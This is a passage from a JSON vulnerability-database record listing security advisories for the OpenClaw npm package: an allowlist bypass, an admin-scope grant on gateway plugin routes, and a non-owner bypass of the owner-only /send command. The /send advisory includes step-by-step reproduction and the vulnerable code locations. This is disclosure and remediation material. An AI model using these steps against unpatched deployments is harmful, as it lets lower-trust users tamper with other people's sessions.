                            "scoring_elements": "SSVCv2/E:N/A:N/T:P/P:M/B:A/M:M/D:T/2026-04-28T13:54:54Z/"
                        }
                    ],
                    "url": "https://www.vulncheck.com/advisories/openclaw-sender-allowlist-bypass-via-graph-api-thread-history"
                },
                {
                    "reference_url": "https://github.com/advisories/GHSA-chfm-xgc4-47rj",
                    "reference_id": "GHSA-chfm-xgc4-47rj",
                    "reference_type": "",
                    "scores": [
                        {
                            "value": "LOW",
                            "scoring_system": "cvssv3.1_qr",
                            "scoring_elements": ""
                        }
                    ],
                    "url": "https://github.com/advisories/GHSA-chfm-xgc4-47rj"
                }
            ],
            "fixed_packages": [
                {
                    "url": "http://public2.vulnerablecode.io/api/packages/109907?format=api",
                    "purl": "pkg:npm/openclaw@2026.3.31",
                    "is_vulnerable": true,
                    "affected_by_vulnerabilities": [
                        {
                            "vulnerability": "VCID-1pbz-8rnx-dkhe"
                        },
                        {
                            "vulnerability": "VCID-258k-a4dw-tfae"
                        },
                        {
                            "vulnerability": "VCID-29a1-7ar7-67e1"
                        },
                        {
                            "vulnerability": "VCID-2c8p-gbaw-3ye4"
                        },
                        {
                            "vulnerability": "VCID-2h6a-becf-x7ej"
                        },
                        {
                            "vulnerability": "VCID-2khh-wv8p-97ff"
                        },
                        {
                            "vulnerability": "VCID-2mxq-krq5-bycx"
                        },
                        {
                            "vulnerability": "VCID-356u-h788-pkgt"
                        },
                        {
                            "vulnerability": "VCID-3xmj-n798-x3cw"
                        },
                        {
                            "vulnerability": "VCID-3zwq-dz2u-pqgv"
                        },
                        {
                            "vulnerability": "VCID-4316-7q9a-xuhx"
                        },
                        {
                            "vulnerability": "VCID-4u3z-rs45-gbhe"
                        },
                        {
                            "vulnerability": "VCID-4urc-4536-pqhk"
                        },
                        {
                            "vulnerability": "VCID-6wth-qthz-yud8"
                        },
                        {
                            "vulnerability": "VCID-6y5w-am4s-6qa5"
                        },
                        {
                            "vulnerability": "VCID-733f-57ds-xugm"
                        },
                        {
                            "vulnerability": "VCID-73cz-n29z-uqem"
                        },
                        {
                            "vulnerability": "VCID-75yr-sbce-nkah"
                        },
                        {
                            "vulnerability": "VCID-7akj-469t-57hz"
                        },
                        {
                            "vulnerability": "VCID-7ntr-5dr5-9uf8"
                        },
                        {
                            "vulnerability": "VCID-7snr-fn3u-x3b8"
                        },
                        {
                            "vulnerability": "VCID-7z2s-k6ty-ekg1"
                        },
                        {
                            "vulnerability": "VCID-96jd-x87b-s3ey"
                        },
                        {
                            "vulnerability": "VCID-9hcd-uj62-8yeu"
                        },
                        {
                            "vulnerability": "VCID-9kgh-wj9w-ykff"
                        },
                        {
                            "vulnerability": "VCID-9xgq-vtg2-jucq"
                        },
                        {
                            "vulnerability": "VCID-a46u-tnbh-fyhs"
                        },
                        {
                            "vulnerability": "VCID-a4jz-y9s4-zkfg"
                        },
                        {
                            "vulnerability": "VCID-arks-g6hw-abbw"
                        },
                        {
                            "vulnerability": "VCID-bgwh-spue-yybk"
                        },
                        {
                            "vulnerability": "VCID-bkya-73v8-bber"
                        },
                        {
                            "vulnerability": "VCID-c25h-khws-2fc3"
                        },
                        {
                            "vulnerability": "VCID-cbuu-4d6c-rben"
                        },
                        {
                            "vulnerability": "VCID-d8v2-gft5-buee"
                        },
                        {
                            "vulnerability": "VCID-dfdk-dhwf-9yaj"
                        },
                        {
                            "vulnerability": "VCID-dmse-bb22-rkcj"
                        },
                        {
                            "vulnerability": "VCID-dv5s-pvw1-a7fu"
                        },
                        {
                            "vulnerability": "VCID-e25p-j5ed-yqfz"
                        },
                        {
                            "vulnerability": "VCID-e4ac-qm17-qbf5"
                        },
                        {
                            "vulnerability": "VCID-fuda-zxu8-gbb4"
                        },
                        {
                            "vulnerability": "VCID-gk95-28x9-17dk"
                        },
                        {
                            "vulnerability": "VCID-gkyv-ahk7-1ud3"
                        },
                        {
                            "vulnerability": "VCID-haxd-ps1x-h3ch"
                        },
                        {
                            "vulnerability": "VCID-hz33-9efv-c7ef"
                        },
                        {
                            "vulnerability": "VCID-jshg-1pb2-wbak"
                        },
                        {
                            "vulnerability": "VCID-k8s8-zjv4-gqdb"
                        },
                        {
                            "vulnerability": "VCID-kcy2-a98b-uyg7"
                        },
                        {
                            "vulnerability": "VCID-kxmf-d7w1-xfcv"
                        },
                        {
                            "vulnerability": "VCID-ma62-gtan-97au"
                        },
                        {
                            "vulnerability": "VCID-mszk-dr24-xugw"
                        },
                        {
                            "vulnerability": "VCID-mv8b-cryt-u3g8"
                        },
                        {
                            "vulnerability": "VCID-mxu5-yjqs-nuap"
                        },
                        {
                            "vulnerability": "VCID-nkh4-j2pe-1qhr"
                        },
                        {
                            "vulnerability": "VCID-ns77-4wfj-9ka6"
                        },
                        {
                            "vulnerability": "VCID-ntwt-jkgr-sffu"
                        },
                        {
                            "vulnerability": "VCID-nv6g-7gs9-pfan"
                        },
                        {
                            "vulnerability": "VCID-nw4r-wjgs-8qc1"
                        },
                        {
                            "vulnerability": "VCID-p7gx-9usz-yyew"
                        },
                        {
                            "vulnerability": "VCID-p7v5-jqhq-nbhz"
                        },
                        {
                            "vulnerability": "VCID-p8xd-2um4-9ufr"
                        },
                        {
                            "vulnerability": "VCID-pae5-uyu7-k3c1"
                        },
                        {
                            "vulnerability": "VCID-pdmd-a4fg-8fcg"
                        },
                        {
                            "vulnerability": "VCID-pj41-sunw-vbcj"
                        },
                        {
                            "vulnerability": "VCID-psms-gauf-tkbz"
                        },
                        {
                            "vulnerability": "VCID-q6ne-sw1r-xkd1"
                        },
                        {
                            "vulnerability": "VCID-qedr-a3ay-v3gx"
                        },
                        {
                            "vulnerability": "VCID-qjss-tvgk-3ubk"
                        },
                        {
                            "vulnerability": "VCID-r5bw-c2py-9udf"
                        },
                        {
                            "vulnerability": "VCID-rr6t-1193-ybgz"
                        },
                        {
                            "vulnerability": "VCID-ry1r-br3q-2uaw"
                        },
                        {
                            "vulnerability": "VCID-t2ve-xemk-mqa9"
                        },
                        {
                            "vulnerability": "VCID-t2yy-9ume-t7be"
                        },
                        {
                            "vulnerability": "VCID-una1-gxkk-t3bp"
                        },
                        {
                            "vulnerability": "VCID-v9cd-65tf-p3f8"
                        },
                        {
                            "vulnerability": "VCID-vfbb-bpy9-87ey"
                        },
                        {
                            "vulnerability": "VCID-vy8v-np82-r3b5"
                        },
                        {
                            "vulnerability": "VCID-vz7k-r7c4-ebfg"
                        },
                        {
                            "vulnerability": "VCID-w2tj-nqa6-cuam"
                        },
                        {
                            "vulnerability": "VCID-w4p1-sxdg-hyha"
                        },
                        {
                            "vulnerability": "VCID-w58d-6veg-uugy"
                        },
                        {
                            "vulnerability": "VCID-wmr3-83u3-6qdb"
                        },
                        {
                            "vulnerability": "VCID-wyce-qxau-mqff"
                        },
                        {
                            "vulnerability": "VCID-x2ru-ydpv-f3ah"
                        },
                        {
                            "vulnerability": "VCID-xfgw-ua7r-abbr"
                        },
                        {
                            "vulnerability": "VCID-xj73-kszs-yygp"
                        },
                        {
                            "vulnerability": "VCID-xnvm-rp36-vyaj"
                        },
                        {
                            "vulnerability": "VCID-xsct-xjs7-nbab"
                        },
                        {
                            "vulnerability": "VCID-y65g-4baa-a7c2"
                        },
                        {
                            "vulnerability": "VCID-y7sd-j9xn-qffs"
                        },
                        {
                            "vulnerability": "VCID-ye4t-n6r3-67ab"
                        },
                        {
                            "vulnerability": "VCID-yhpq-5qy3-y7bn"
                        },
                        {
                            "vulnerability": "VCID-ymmv-2qmq-6kap"
                        },
                        {
                            "vulnerability": "VCID-z8mj-pnbe-wqej"
                        },
                        {
                            "vulnerability": "VCID-zg68-u5b5-vkft"
                        },
                        {
                            "vulnerability": "VCID-zpte-tgt5-wqcm"
                        },
                        {
                            "vulnerability": "VCID-zu4s-jnn3-1kd8"
                        },
                        {
                            "vulnerability": "VCID-zunq-wnnf-k3fw"
                        }
                    ],
                    "resource_url": "http://public2.vulnerablecode.io/packages/pkg:npm/openclaw@2026.3.31"
                }
            ],
            "aliases": [
                "CVE-2026-41365",
                "GHSA-chfm-xgc4-47rj"
            ],
            "risk_score": 2.5,
            "exploitability": "0.5",
            "weighted_severity": "4.9",
            "resource_url": "http://public2.vulnerablecode.io/vulnerabilities/VCID-j8fb-fhyc-33fu"
        },
        {
            "url": "http://public2.vulnerablecode.io/api/vulnerabilities/91262?format=api",
            "vulnerability_id": "VCID-j92n-5217-9bhj",
            "summary": "OpenClaw: Gateway Plugin HTTP Auth Grants Unrestricted operator.admin Runtime Scope to All Callers\n## Summary\n\nGateway Plugin HTTP auth: \"gateway\" Mints operator.admin Runtime Scope\n\n## Affected Packages / Versions\n\n- Package: `openclaw`\n- Affected versions: `<= 2026.3.24`\n- First patched version: `2026.3.25`\n- Latest published npm version at verification time: `2026.3.24`\n\n## Details\n\nGateway-authenticated plugin HTTP routes previously created a runtime scope set that included `operator.admin` regardless of caller-granted scopes. Commit `ec2dbcff9afd8a52e00de054b506c91726d9fbbe` keeps plugin HTTP runtime scopes least-privileged and preserves caller scope boundaries.\n\nVerified vulnerable on tag `v2026.3.24` and fixed on `main` by commit `ec2dbcff9afd8a52e00de054b506c91726d9fbbe`.\n\n## Fix Commit(s)\n\n- `ec2dbcff9afd8a52e00de054b506c91726d9fbbe`",
            "references": [
                {
                    "reference_url": "https://api.first.org/data/v1/epss?cve=CVE-2026-35669",
                    "reference_id": "",
                    "reference_type": "",
                    "scores": [
                        {
                            "value": "0.0005",
                            "scoring_system": "epss",
                            "scoring_elements": "0.15986",
                            "published_at": "2026-06-07T12:55:00Z"
                        },
                        {
                            "value": "0.0005",
                            "scoring_system": "epss",
                            "scoring_elements": "0.1603",
                            "published_at": "2026-06-06T12:55:00Z"
                        },
                        {
                            "value": "0.0005",
                            "scoring_system": "epss",
                            "scoring_elements": "0.1604",
                            "published_at": "2026-06-05T12:55:00Z"
                        }
                    ],
                    "url": "https://api.first.org/data/v1/epss?cve=CVE-2026-35669"
                },
                {
                    "reference_url": "https://github.com/openclaw/openclaw",
                    "reference_id": "",
                    "reference_type": "",
                    "scores": [
                        {
                            "value": "8.6",
                            "scoring_system": "cvssv4",
                            "scoring_elements": "CVSS:4.0/AV:N/AC:L/AT:N/PR:L/UI:N/VC:H/VI:H/VA:N/SC:L/SI:L/SA:N"
                        },
                        {
                            "value": "HIGH",
                            "scoring_system": "generic_textual",
                            "scoring_elements": ""
                        }
                    ],
                    "url": "https://github.com/openclaw/openclaw"
                },
                {
                    "reference_url": "https://github.com/openclaw/openclaw/commit/ec2dbcff9afd8a52e00de054b506c91726d9fbbe",
                    "reference_id": "",
                    "reference_type": "",
                    "scores": [
                        {
                            "value": "8.8",
                            "scoring_system": "cvssv3.1",
                            "scoring_elements": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H"
                        },
                        {
                            "value": "8.6",
                            "scoring_system": "cvssv4",
                            "scoring_elements": "CVSS:4.0/AV:N/AC:L/AT:N/PR:L/UI:N/VC:H/VI:H/VA:N/SC:L/SI:L/SA:N"
                        },
                        {
                            "value": "8.7",
                            "scoring_system": "cvssv4",
                            "scoring_elements": "CVSS:4.0/AV:N/AC:L/AT:N/PR:L/UI:N/VC:H/VI:H/VA:H/SC:N/SI:N/SA:N"
                        },
                        {
                            "value": "HIGH",
                            "scoring_system": "generic_textual",
                            "scoring_elements": ""
                        },
                        {
                            "value": "Track",
                            "scoring_system": "ssvc",
                            "scoring_elements": "SSVCv2/E:N/A:N/T:T/P:M/B:A/M:M/D:T/2026-04-14T14:27:16Z/"
                        }
                    ],
                    "url": "https://github.com/openclaw/openclaw/commit/ec2dbcff9afd8a52e00de054b506c91726d9fbbe"
                },
                {
                    "reference_url": "https://github.com/openclaw/openclaw/security/advisories/GHSA-qm2m-28pf-hgjw",
                    "reference_id": "",
                    "reference_type": "",
                    "scores": [
                        {
                            "value": "8.8",
                            "scoring_system": "cvssv3.1",
                            "scoring_elements": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H"
                        },
                        {
                            "value": "HIGH",
                            "scoring_system": "cvssv3.1_qr",
                            "scoring_elements": ""
                        },
                        {
                            "value": "8.6",
                            "scoring_system": "cvssv4",
                            "scoring_elements": "CVSS:4.0/AV:N/AC:L/AT:N/PR:L/UI:N/VC:H/VI:H/VA:N/SC:L/SI:L/SA:N"
                        },
                        {
                            "value": "8.7",
                            "scoring_system": "cvssv4",
                            "scoring_elements": "CVSS:4.0/AV:N/AC:L/AT:N/PR:L/UI:N/VC:H/VI:H/VA:H/SC:N/SI:N/SA:N"
                        },
                        {
                            "value": "HIGH",
                            "scoring_system": "generic_textual",
                            "scoring_elements": ""
                        },
                        {
                            "value": "Track",
                            "scoring_system": "ssvc",
                            "scoring_elements": "SSVCv2/E:N/A:N/T:T/P:M/B:A/M:M/D:T/2026-04-14T14:27:16Z/"
                        }
                    ],
                    "url": "https://github.com/openclaw/openclaw/security/advisories/GHSA-qm2m-28pf-hgjw"
                },
                {
                    "reference_url": "https://nvd.nist.gov/vuln/detail/CVE-2026-35669",
                    "reference_id": "CVE-2026-35669",
                    "reference_type": "",
                    "scores": [],
                    "url": "https://nvd.nist.gov/vuln/detail/CVE-2026-35669"
                },
                {
                    "reference_url": "https://github.com/advisories/GHSA-qm2m-28pf-hgjw",
                    "reference_id": "GHSA-qm2m-28pf-hgjw",
                    "reference_type": "",
                    "scores": [
                        {
                            "value": "HIGH",
                            "scoring_system": "cvssv3.1_qr",
                            "scoring_elements": ""
                        }
                    ],
                    "url": "https://github.com/advisories/GHSA-qm2m-28pf-hgjw"
                },
                {
                    "reference_url": "https://www.vulncheck.com/advisories/openclaw-privilege-escalation-via-gateway-plugin-http-authentication-scope",
                    "reference_id": "openclaw-privilege-escalation-via-gateway-plugin-http-authentication-scope",
                    "reference_type": "",
                    "scores": [
                        {
                            "value": "8.8",
                            "scoring_system": "cvssv3.1",
                            "scoring_elements": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H"
                        },
                        {
                            "value": "8.7",
                            "scoring_system": "cvssv4",
                            "scoring_elements": "CVSS:4.0/AV:N/AC:L/AT:N/PR:L/UI:N/VC:H/VI:H/VA:H/SC:N/SI:N/SA:N"
                        },
                        {
                            "value": "Track",
                            "scoring_system": "ssvc",
                            "scoring_elements": "SSVCv2/E:N/A:N/T:T/P:M/B:A/M:M/D:T/2026-04-14T14:27:16Z/"
                        }
                    ],
                    "url": "https://www.vulncheck.com/advisories/openclaw-privilege-escalation-via-gateway-plugin-http-authentication-scope"
                }
            ],
            "fixed_packages": [],
            "aliases": [
                "CVE-2026-35669",
                "GHSA-qm2m-28pf-hgjw"
            ],
            "risk_score": 4.0,
            "exploitability": "0.5",
            "weighted_severity": "8.0",
            "resource_url": "http://public2.vulnerablecode.io/vulnerabilities/VCID-j92n-5217-9bhj"
        },
        {
            "url": "http://public2.vulnerablecode.io/api/vulnerabilities/91382?format=api",
            "vulnerability_id": "VCID-j96c-kau3-7fag",
            "summary": "OpenClaw: Non-owner command-authorized sender can change the owner-only `/send` session delivery policy\n> Fixed in OpenClaw 2026.3.24, the current shipping release.\n\n**Title**  \nNon-owner command-authorized sender can change the owner-only `/send` session delivery policy\n\n**CWE**  \nCWE-285 Improper Authorization\n\n**CVSS v3.1**  \nCVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:L/A:L  \nBase score: **5.4 (Medium)**\n\n**Severity Assessment**  \nMedium. This is a real owner-only authorization bypass, but the demonstrated impact is limited to persistent mutation of the current session’s delivery policy rather than direct code execution, sandbox escape, or cross-host compromise.\n\n**Impact**  \nA non-owner sender who is allowed to run commands can invoke `/send on|off|inherit` and persistently change the current session’s `sendPolicy`, even though OpenClaw documents `/send` as owner-only.\n\nThat lets a lower-trust participant:\n- disable reply delivery for the current session (`/send off`), suppressing future replies in that chat;\n- re-enable reply delivery (`/send on`) after the owner intentionally disabled it;\n- remove the session override (`/send inherit`).\n\n**Affected Component**  \nVerified against the latest published GitHub release tag `v2026.3.23` (`ccfeecb6887cd97937e33a71877ad512741e82b2`), published `2026-03-23T23:15:50Z`.\n\nExact vulnerable path on the shipped tag:\n- `src/auto-reply/reply/commands-session.ts:212-239`\n  - `handleSendPolicyCommand(...)` checks only `params.command.isAuthorizedSender`.\n  - when true, it mutates `params.sessionEntry.sendPolicy` and persists the session entry.\n\nAuthorization behavior that makes this reachable:\n- `src/auto-reply/command-auth.ts:401-407`\n  - `senderIsOwner` is computed separately from general command authorization.\n- `src/auto-reply/command-auth.ts:420-429`\n  - command authorization can succeed even when `senderIsOwner === false`.\n- 
`src/auto-reply/command-auth.owner-default.test.ts:10-47`\n  - existing coverage confirms a sender can be command-authorized while not treated as owner.\n\nDocumented owner-only contract:\n- `docs/tools/slash-commands.md:112`\n  - `/send on|off|inherit` is documented as owner-only.\n- `docs/concepts/session-tool.md:156`\n  - `sendPolicy` is documented as settable via `sessions.patch` or owner-only `/send on|off|inherit`.\n\nRelated privilege model:\n- `src/gateway/method-scopes.ts:131-133`\n  - `sessions.patch` is admin-scoped, which reinforces that session-delivery-policy mutation is treated as privileged state.\n\nVersion history:\n- The vulnerable handler exists in release history going back at least to commit `ea018a68ccb92dbc735bc1df9880d5c95c63ca35` (`refactor(auto-reply): split reply pipeline`).\n- Earliest released affected tag found: `v2026.1.14-1`\n- Latest released affected tag verified: `v2026.3.23`\n\n**Technical Reproduction**  \n1. Check out the shipped release tag `v2026.3.23`.\n2. Configure a channel where:\n   - a non-owner sender is allowed to run commands, for example through `commands.allowFrom`;\n   - the owner identity is distinct, for example via `commands.ownerAllowFrom`.\n3. Start or reuse a session with a live `sessionEntry` and `sessionStore`.\n4. Send `/send off` as the non-owner but command-authorized sender.\n5. Confirm the resolved command context has:\n   - `isAuthorizedSender === true`\n   - `senderIsOwner === false`\n6. 
Observe that the handler still accepts the command, mutates `sessionEntry.sendPolicy`, and persists the session entry.\n\n**Demonstrated Impact**  \nThe vulnerable handler performs a real persistent session-state change:\n- `src/auto-reply/reply/commands-session.ts:232-238`\n  - `/send inherit` deletes `sessionEntry.sendPolicy`\n  - other modes assign `sessionEntry.sendPolicy = sendPolicyCommand.mode`\n  - the handler then calls `persistSessionEntry(params)`\n\nThe mutation is not gated by owner status, only by general command authorization.\n\nThat changes subsequent delivery behavior for the current session, which matches the documented meaning of `sendPolicy`.\n\n**Environment**  \n- Product: OpenClaw\n- Verified shipped tag: `v2026.3.23`\n- Shipped tag commit: `ccfeecb6887cd97937e33a71877ad512741e82b2`\n- Published GitHub release time: `2026-03-23T23:15:50Z`\n- Verification date: `2026-03-24`\n\n**Duplicate Check**  \nUpon inspection there is no preexisting GHSA for `/send`.\n\nThis is distinct from:\n- `GHSA-r7vr-gr74-94p8`\n  - that advisory covered owner-only authorization bypasses for `/config` and `/debug`, not `/send`.\n\nThis is the same authorization class, but a different privileged command surface that still lacks the owner check.\n\n**In Scope Check**  \nThis report is in scope under `SECURITY.md` because:\n- it does **not** rely on adversarial operators sharing one gateway host or config;\n- it does **not** rely on trusted local state tampering;\n- `SECURITY.md:151-152` explicitly says non-owner sender status matters for owner-only tools and commands;\n- `/send` is explicitly documented as owner-only, so this is a direct owner-only authorization bypass, not a complaint about normal shared-agent steering.\n\nThis is therefore a concrete authorization flaw against a documented product boundary.\n\n**Remediation Advice**  \n1. Change `/send` to require owner status, not just command authorization.\n2. 
Reuse the same owner-only rejection pattern already used by privileged command surfaces such as `/config`, `/debug`, and owner-only `/plugins` writes.\n3. Add regression coverage for the exact case where:\n   - a non-owner sender is command-authorized;\n   - `/send` must still be rejected unless `senderIsOwner === true`.\n4. Verify that the owner can still use `/send on|off|inherit` normally.",
            "references": [
                {
                    "reference_url": "https://api.first.org/data/v1/epss?cve=CVE-2026-35620",
                    "reference_id": "",
                    "reference_type": "",
                    "scores": [
                        {
                            "value": "0.00065",
                            "scoring_system": "epss",
                            "scoring_elements": "0.20449",
                            "published_at": "2026-06-07T12:55:00Z"
                        },
                        {
                            "value": "0.00065",
                            "scoring_system": "epss",
                            "scoring_elements": "0.20489",
                            "published_at": "2026-06-06T12:55:00Z"
                        },
                        {
                            "value": "0.00065",
                            "scoring_system": "epss",
                            "scoring_elements": "0.20501",
                            "published_at": "2026-06-05T12:55:00Z"
                        }
                    ],
                    "url": "https://api.first.org/data/v1/epss?cve=CVE-2026-35620"
                },
                {
                    "reference_url": "https://github.com/openclaw/openclaw",
                    "reference_id": "",
                    "reference_type": "",
                    "scores": [
                        {
                            "value": "5.4",
                            "scoring_system": "cvssv3.1",
                            "scoring_elements": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:L/A:L"
                        },
                        {
                            "value": "5.3",
                            "scoring_system": "cvssv4",
                            "scoring_elements": "CVSS:4.0/AV:N/AC:L/AT:N/PR:L/UI:N/VC:N/VI:L/VA:L/SC:N/SI:N/SA:N"
                        },
                        {
                            "value": "MODERATE",
                            "scoring_system": "generic_textual",
                            "scoring_elements": ""
                        }
                    ],
                    "url": "https://github.com/openclaw/openclaw"
                },
                {
                    "reference_url": "https://github.com/openclaw/openclaw/commit/555b2578a8cc6e1b93f717496935ead97bfbed8b",
                    "reference_id": "",
                    "reference_type": "",
                    "scores": [
                        {
                            "value": "5.4",
                            "scoring_system": "cvssv3.1",
                            "scoring_elements": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:L/A:L"
                        },
                        {
                            "value": "5.3",
                            "scoring_system": "cvssv4",
                            "scoring_elements": "CVSS:4.0/AV:N/AC:L/AT:N/PR:L/UI:N/VC:N/VI:L/VA:L/SC:N/SI:N/SA:N"
                        },
                        {
                            "value": "MODERATE",
                            "scoring_system": "generic_textual",
                            "scoring_elements": ""
                        },
                        {
                            "value": "Track",
                            "scoring_system": "ssvc",
                            "scoring_elements": "SSVCv2/E:N/A:N/T:P/P:M/B:A/M:M/D:T/2026-04-10T20:15:56Z/"
                        }
                    ],
                    "url": "https://github.com/openclaw/openclaw/commit/555b2578a8cc6e1b93f717496935ead97bfbed8b"
                },
                {
                    "reference_url": "https://github.com/openclaw/openclaw/commit/ccfeecb6887cd97937e33a71877ad512741e82b2",
                    "reference_id": "",
                    "reference_type": "",
                    "scores": [
                        {
                            "value": "5.4",
                            "scoring_system": "cvssv3.1",
                            "scoring_elements": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:L/A:L"
                        },
                        {
                            "value": "5.3",
                            "scoring_system": "cvssv4",
                            "scoring_elements": "CVSS:4.0/AV:N/AC:L/AT:N/PR:L/UI:N/VC:N/VI:L/VA:L/SC:N/SI:N/SA:N"
                        },
                        {
                            "value": "MODERATE",
                            "scoring_system": "generic_textual",
                            "scoring_elements": ""
                        },
                        {
                            "value": "Track",
                            "scoring_system": "ssvc",
                            "scoring_elements": "SSVCv2/E:N/A:N/T:P/P:M/B:A/M:M/D:T/2026-04-10T20:15:56Z/"
                        }
                    ],
                    "url": "https://github.com/openclaw/openclaw/commit/ccfeecb6887cd97937e33a71877ad512741e82b2"
                },
                {
                    "reference_url": "https://github.com/openclaw/openclaw/commit/ea018a68ccb92dbc735bc1df9880d5c95c63ca35",
                    "reference_id": "",
                    "reference_type": "",
                    "scores": [
                        {
                            "value": "5.4",
                            "scoring_system": "cvssv3.1",
                            "scoring_elements": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:L/A:L"
                        },
                        {
                            "value": "5.3",
                            "scoring_system": "cvssv4",
                            "scoring_elements": "CVSS:4.0/AV:N/AC:L/AT:N/PR:L/UI:N/VC:N/VI:L/VA:L/SC:N/SI:N/SA:N"
                        },
                        {
                            "value": "MODERATE",
                            "scoring_system": "generic_textual",
                            "scoring_elements": ""
                        },
                        {
                            "value": "Track",
                            "scoring_system": "ssvc",
                            "scoring_elements": "SSVCv2/E:N/A:N/T:P/P:M/B:A/M:M/D:T/2026-04-10T20:15:56Z/"
                        }
                    ],
                    "url": "https://github.com/openclaw/openclaw/commit/ea018a68ccb92dbc735bc1df9880d5c95c63ca35"
                },
                {
                    "reference_url": "https://github.com/openclaw/openclaw/security/advisories/GHSA-39mp-545q-w789",
                    "reference_id": "",
                    "reference_type": "",
                    "scores": [
                        {
                            "value": "5.4",
                            "scoring_system": "cvssv3.1",
                            "scoring_elements": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:L/A:L"
                        },
                        {
                            "value": "MODERATE",
                            "scoring_system": "cvssv3.1_qr",
                            "scoring_elements": ""
                        },
                        {
                            "value": "5.3",
                            "scoring_system": "cvssv4",
                            "scoring_elements": "CVSS:4.0/AV:N/AC:L/AT:N/PR:L/UI:N/VC:N/VI:L/VA:L/SC:N/SI:N/SA:N"
                        },
                        {
                            "value": "MODERATE",
                            "scoring_system": "generic_textual",
                            "scoring_elements": ""
                        },
                        {
                            "value": "Track",
                            "scoring_system": "ssvc",
                            "scoring_elements": "SSVCv2/E:N/A:N/T:P/P:M/B:A/M:M/D:T/2026-04-10T20:15:56Z/"
                        }
                    ],
                    "url": "https://github.com/openclaw/openclaw/security/advisories/GHSA-39mp-545q-w789"
                },
                {
                    "reference_url": "https://github.com/openclaw/openclaw/security/advisories/GHSA-vqvg-86cc-cg83",
                    "reference_id": "",
                    "reference_type": "",
                    "scores": [
                        {
                            "value": "5.4",
                            "scoring_system": "cvssv3.1",
                            "scoring_elements": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:L/A:L"
                        },
                        {
                            "value": "5.3",
                            "scoring_system": "cvssv4",
                            "scoring_elements": "CVSS:4.0/AV:N/AC:L/AT:N/PR:L/UI:N/VC:N/VI:L/VA:L/SC:N/SI:N/SA:N"
                        },
                        {
                            "value": "MODERATE",
                            "scoring_system": "generic_textual",
                            "scoring_elements": ""
                        },
                        {
                            "value": "Track",
                            "scoring_system": "ssvc",
                            "scoring_elements": "SSVCv2/E:N/A:N/T:P/P:M/B:A/M:M/D:T/2026-04-10T20:15:56Z/"
                        }
                    ],
                    "url": "https://github.com/openclaw/openclaw/security/advisories/GHSA-vqvg-86cc-cg83"
                },
                {
                    "reference_url": "https://nvd.nist.gov/vuln/detail/CVE-2026-35620",
                    "reference_id": "",
                    "reference_type": "",
                    "scores": [
                        {
                            "value": "5.4",
                            "scoring_system": "cvssv3.1",
                            "scoring_elements": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:L/A:L"
                        },
                        {
                            "value": "5.3",
                            "scoring_system": "cvssv4",
                            "scoring_elements": "CVSS:4.0/AV:N/AC:L/AT:N/PR:L/UI:N/VC:N/VI:L/VA:L/SC:N/SI:N/SA:N"
                        },
                        {
                            "value": "MODERATE",
                            "scoring_system": "generic_textual",
                            "scoring_elements": ""
                        }
                    ],
                    "url": "https://nvd.nist.gov/vuln/detail/CVE-2026-35620"
                },
                {
                    "reference_url": "https://www.vulncheck.com/advisories/openclaw-missing-authorization-in-send-and-allowlist-chat-commands",
                    "reference_id": "",
                    "reference_type": "",
                    "scores": [
                        {
                            "value": "5.4",
                            "scoring_system": "cvssv3.1",
                            "scoring_elements": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:L/A:L"
                        },
                        {
                            "value": "5.3",
                            "scoring_system": "cvssv4",
                            "scoring_elements": "CVSS:4.0/AV:N/AC:L/AT:N/PR:L/UI:N/VC:N/VI:L/VA:L/SC:N/SI:N/SA:N"
                        },
                        {
                            "value": "MODERATE",
                            "scoring_system": "generic_textual",
                            "scoring_elements": ""
                        },
                        {
                            "value": "Track",
                            "scoring_system": "ssvc",
                            "scoring_elements": "SSVCv2/E:N/A:N/T:P/P:M/B:A/M:M/D:T/2026-04-10T20:15:56Z/"
                        }
                    ],
                    "url": "https://www.vulncheck.com/advisories/openclaw-missing-authorization-in-send-and-allowlist-chat-commands"
                },
                {
                    "reference_url": "https://github.com/advisories/GHSA-39mp-545q-w789",
                    "reference_id": "GHSA-39mp-545q-w789",
                    "reference_type": "",
                    "scores": [
                        {
                            "value": "MODERATE",
                            "scoring_system": "cvssv3.1_qr",
                            "scoring_elements": ""
                        }
                    ],
                    "url": "https://github.com/advisories/GHSA-39mp-545q-w789"
                }
            ],
            "fixed_packages": [
                {
                    "url": "http://public2.vulnerablecode.io/api/packages/110567?format=api",
                    "purl": "pkg:npm/openclaw@2026.3.24",
                    "is_vulnerable": true,
                    "affected_by_vulnerabilities": [
                        {
                            "vulnerability": "VCID-1j3m-fecr-f7cn"
                        },
                        {
                            "vulnerability": "VCID-1p3b-pfnn-x7ad"
                        },
                        {
                            "vulnerability": "VCID-1p5p-eth5-3ufu"
                        },
                        {
                            "vulnerability": "VCID-1pbz-8rnx-dkhe"
                        },
                        {
                            "vulnerability": "VCID-1smq-mbty-jkaj"
                        },
                        {
                            "vulnerability": "VCID-24m7-jx1g-hqde"
                        },
                        {
                            "vulnerability": "VCID-258k-a4dw-tfae"
                        },
                        {
                            "vulnerability": "VCID-26kp-dbu2-pqej"
                        },
                        {
                            "vulnerability": "VCID-26sg-e29u-hkf3"
                        },
                        {
                            "vulnerability": "VCID-294z-6z8j-97bx"
                        },
                        {
                            "vulnerability": "VCID-29a1-7ar7-67e1"
                        },
                        {
                            "vulnerability": "VCID-2c8p-gbaw-3ye4"
                        },
                        {
                            "vulnerability": "VCID-2h6a-becf-x7ej"
                        },
                        {
                            "vulnerability": "VCID-2hca-3v8f-f3e8"
                        },
                        {
                            "vulnerability": "VCID-2khh-wv8p-97ff"
                        },
                        {
                            "vulnerability": "VCID-2mxq-krq5-bycx"
                        },
                        {
                            "vulnerability": "VCID-2uqu-k42d-1baq"
                        },
                        {
